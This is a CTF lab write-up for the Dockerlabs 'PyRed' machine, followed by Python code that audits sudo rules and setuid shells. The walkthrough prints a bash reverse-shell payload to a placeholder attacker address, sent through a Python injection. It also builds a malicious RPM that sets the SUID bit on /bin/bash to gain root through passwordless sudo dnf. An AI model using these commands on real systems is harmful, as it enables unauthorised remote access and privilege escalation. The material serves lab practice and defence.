
Writeup PyRed from Dockerlabs


I'm passionate about ethical hacking and constantly strive to improve my skills. I regularly solve CTF challenges to practice and expand my knowledge in cybersecurity.

You have two options: READ this writeup, or WATCH me complete this CTF machine on YouTube.

Do not press the Subscribe Button, it's ILLEGAL 😁😆😅😂🤣

Let's start our reconnaissance with a quick nmap scan:

nmap -p- --open -sV -sC -sS --min-rate=5000 -n -Pn 172.17.0.2 -oN Nmap1

-p- - Scan all 65535 TCP ports, not just the default top 1000

--open - Show only ports that are open

-sS - TCP SYN ("half-open") scan, faster than a full connect scan (needs root privileges)

-sC - Run nmap's default set of NSE reconnaissance scripts

-sV - Probe each open port to identify the service and its version

--min-rate=5000 - Send packets no slower than 5000 per second, which speeds the scan up at the cost of being noisier

-n - No DNS resolution

-Pn - Skip host discovery (treat the host as up)

-oN - Save normal-format output to the named file

Port 5000 is open:

We explored the web interface available on port 5000.

The page allowed Python code injection, so we exploited this to get a reverse shell by executing the following code from the web console:

import os
os.system("/bin/bash -i >& /dev/tcp/your_ip_address/your_port 0>&1")

Be sure to replace "your_ip_address" and "your_port" with your actual IP address and port number.

We ran sudo -l to check the current user's permissions.

We observed that the user could execute dnf as a superuser without a password.

To exploit this privilege, we created a malicious RPM package on our attacking machine to modify the permissions of /bin/bash by setting the SUID bit.

TF=$(mktemp -d)
echo 'chmod u+s /bin/bash' > $TF/x.sh
fpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF

  • Set up a simple HTTP server to share the .rpm file:

    python3 -m http.server 8000

    On the target machine, we use curl to download the malicious RPM file.

  • Install the RPM using dnf:

    sudo -u root /usr/bin/dnf install -y paq.rpm

    After installing the RPM, /bin/bash will have the SUID bit set. We can now gain root access by running:

bash -p

And we are root.
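From the defender's side, the whole escalation rests on two observable conditions: a sudoers rule that lets a low-privileged user run a package manager as root, and a shell binary carrying the setuid bit afterwards. Here is an added example (my own code, not part of the writeup) of a small audit that flags both. The `sudo -l` text it parses is constructed to resemble what the writeup describes; the real output is not reproduced on the page, and the list of package-manager names is my assumption about what deserves a flag.

```python
import os
import re
import stat

# Added example: audit helpers for the two conditions the writeup relies on.

# Binaries that install arbitrary files or run install-time scriptlets as root;
# unrestricted root access to any of them is equivalent to full root. (My list.)
PACKAGE_MANAGERS = {
    "dnf", "yum", "rpm", "apt", "apt-get", "dpkg", "zypper", "pacman", "pip", "pip3",
}

# Constructed sample of `sudo -l` output, modelled on the writeup (not the real output).
SAMPLE_SUDO_L = """\
Matching Defaults entries for app on pyred:
    env_reset, mail_badpass
User app may run the following commands on pyred:
    (root) NOPASSWD: /usr/bin/dnf
    (root) /usr/bin/systemctl restart app
    (ALL) NOPASSWD: ALL
"""

# One `sudo -l` rule line: "(runas) TAG: TAG: command args".
_RULE_RE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$"
)


def find_risky_sudo_rules(sudo_l_output: str):
    """Return (runas, command, reason) for rules granting ALL or a package manager as root."""
    findings = []
    for line in sudo_l_output.splitlines():
        m = _RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmd = m.group("runas"), m.group("tags"), m.group("cmd")
        nopasswd = "NOPASSWD" in tags
        if cmd == "ALL":
            findings.append((runas, cmd, "unrestricted ALL"))
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in PACKAGE_MANAGERS:
            reason = "package manager as root" + (" without password" if nopasswd else "")
            findings.append((runas, cmd, reason))
    return findings


def mode_has_setuid(mode: int) -> bool:
    """True if an st_mode value carries the setuid bit (what `chmod u+s` sets)."""
    return bool(mode & stat.S_ISUID)


def suid_shells(paths=("/bin/bash", "/bin/sh", "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/zsh")):
    """Return the shells in `paths` that exist and are setuid; a shell should never be."""
    hits = []
    for path in paths:
        try:
            st = os.stat(path)
        except FileNotFoundError:
            continue
        if mode_has_setuid(st.st_mode):
            hits.append(path)
    return hits


if __name__ == "__main__":
    for runas, cmd, reason in find_risky_sudo_rules(SAMPLE_SUDO_L):
        print(f"RISKY sudo rule: ({runas}) {cmd}  [{reason}]")
    print("setuid shells on this host:", suid_shells() or "none")
```

Run on a real host, `find_risky_sudo_rules` can be fed the output of `sudo -l` (or the parsed contents of /etc/sudoers.d), and `suid_shells` is the check a file-integrity job should run after any package install, since an RPM scriptlet executing as root is exactly the step that flipped the bit here.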

Thank you so much for reading this. Please don't forget to check out my YouTube channel and subscribe. Thank you all!